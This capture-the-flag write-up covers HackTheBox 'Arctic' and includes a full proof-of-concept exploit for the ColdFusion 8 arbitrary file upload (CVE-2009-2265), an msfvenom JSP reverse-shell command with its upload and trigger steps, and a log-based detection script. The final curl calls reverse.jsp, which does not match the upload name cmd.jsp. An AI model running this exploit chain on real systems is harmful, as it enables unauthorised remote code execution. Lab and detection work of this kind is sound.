HackTheBox - Arctic

Nmap scan results

Remote Procedure Call (RPC) is a protocol that lets a program request a service from a program on another computer on a network without having to understand the network's details. RPC lets a client invoke procedures on a remote system as if they were local.
Identifying ColdFusion running on port 8500

The webserver is running ColdFusion 8 and we can check for known vulnerabilities using searchsploit.

Exploiting ColdFusion's Arbitrary File Upload
We can try the Arbitrary File Upload module, as we are not interested in exploiting Cross Site Scripting.
References: https://onecompiler.com/python/3vurkz7hh
# Exploit Author: Alexander Reid
# Vendor Homepage: http://www.adobe.com/products/coldfusion-family.html
# Version: ColdFusion 8.0.1
# CVE: CVE-2009-2265
#
# Description:
# A standalone proof of concept that demonstrates an arbitrary file upload vulnerability in ColdFusion 8.0.1
# Uploads the specified jsp file to the remote server.
#
# Usage: ./exploit.py <target ip> <target port> [/path/to/coldfusion] </path/to/payload.jsp>
# Example: ./exploit.py 127.0.0.1 8500 /home/arrexel/shell.jsp
#
# Note: this is a Python 2 script (print statements), as published.
import requests, sys

try:
    ip = sys.argv[1]
    port = sys.argv[2]
    # The ColdFusion path prefix is optional; the payload file is always the last argument.
    if len(sys.argv) == 5:
        path = sys.argv[3]
        with open(sys.argv[4], 'r') as payload:
            body = payload.read()
    else:
        path = ""
        with open(sys.argv[3], 'r') as payload:
            body = payload.read()
except IndexError:
    print 'Usage: ./exploit.py <target ip/hostname> <target port> [/path/to/coldfusion] </path/to/payload.jsp>'
    print 'Example: ./exploit.py example.com 8500 /home/arrexel/shell.jsp'
    sys.exit(-1)

basepath = "http://" + ip + ":" + port + path

print 'Sending payload...'
try:
    # One multipart POST to the FCKeditor connector; the server is slow, hence the 90 s timeout.
    req = requests.post(basepath + "/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/cmd.jsp%00",
                        files={'newfile': ('exploit2.txt', body, 'application/x-java-archive')}, timeout=90)
    if req.status_code == 200:
        print 'Successfully uploaded payload!\nFind it at ' + basepath + '/userfiles/file/cmd.jsp'
    else:
        print 'Failed to upload payload... ' + str(req.status_code) + ' ' + req.reason
except requests.Timeout:
    print 'Failed to upload payload... Request timed out'
Let's upload a cmd.jsp file. You can get the cmd.jsp file from here.

The webserver takes a long time to process a single request, so uploading the payload may take a while.
After the webshell gets uploaded, we can try a simple command to test it out.
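From the defender's side, the upload above leaves a very recognisable trace in the web server access log. The following detection example is added here and is not part of the original writeup or of the exploit: it parses constructed Combined Log Format lines (the IPs, timestamps and byte counts are made up) and flags the FCKeditor connector request pattern the script sends, plus any later request that executes a script out of /userfiles/file/.

```python
import re
from urllib.parse import unquote

# Constructed Combined Log Format lines (not real traffic): the exploit's upload
# request, a follow-up hit on the dropped JSP, and two benign CFIDE requests.
SAMPLE_LOGS = """\
10.10.14.5 - - [09/Feb/2020:10:01:02 +0000] "POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/cmd.jsp%00 HTTP/1.1" 200 512 "-" "python-requests/2.22.0"
10.10.14.5 - - [09/Feb/2020:10:01:40 +0000] "GET /userfiles/file/cmd.jsp?cmd=whoami HTTP/1.1" 200 87 "-" "curl/7.68.0"
192.168.1.20 - - [09/Feb/2020:10:02:00 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.168.1.21 - - [09/Feb/2020:10:02:10 +0000] "GET /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=GetFolders&Type=File&CurrentFolder=/ HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')
CONNECTOR = "/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/"
SERVED_DIR = "/userfiles/file/"
EXEC_EXT = (".jsp", ".cfm", ".cfml")

def classify(line):
    """Return the alert reasons for one access-log line (empty list if benign)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    path, _, query = m.group("url").partition("?")
    lpath = path.lower()
    decoded = unquote(query)  # %00 becomes a real NUL byte here
    reasons = []
    if lpath.startswith(CONNECTOR):
        if m.group("method") == "POST" and "Command=FileUpload" in query:
            reasons.append("fckeditor-file-upload")
        if "\x00" in decoded:
            reasons.append("null-byte-in-query")
        if any(ext in decoded.lower() for ext in EXEC_EXT):
            reasons.append("executable-extension-in-folder-param")
    if lpath.startswith(SERVED_DIR) and lpath.endswith(EXEC_EXT):
        reasons.append("script-executed-from-userfiles")
    return reasons

def scan(log_text):
    """Return (client ip, status, reasons) for every suspicious line."""
    hits = []
    for line in log_text.splitlines():
        reasons = classify(line)
        if reasons:
            m = LOG_RE.match(line)
            hits.append((m.group("ip"), int(m.group("status")), reasons))
    return hits

if __name__ == "__main__":
    for ip, status, reasons in scan(SAMPLE_LOGS):
        print(ip, status, ", ".join(reasons))
```

A legitimate FCKeditor folder listing (the last sample line) produces no alert, so the rule keys on the upload command, the NUL byte and the executable extension rather than on the connector path alone.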

Generating JSP Reverse Shell using MSFVenom
Now I will upload a reverse shell instead of running commands through the webshell, as that takes a very long time.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f raw > shell.jsp
python exploit.py 10.10.10.11 8500 shell.jsp
curl http://10.10.10.11:8500/userfiles/file/reverse.jsp
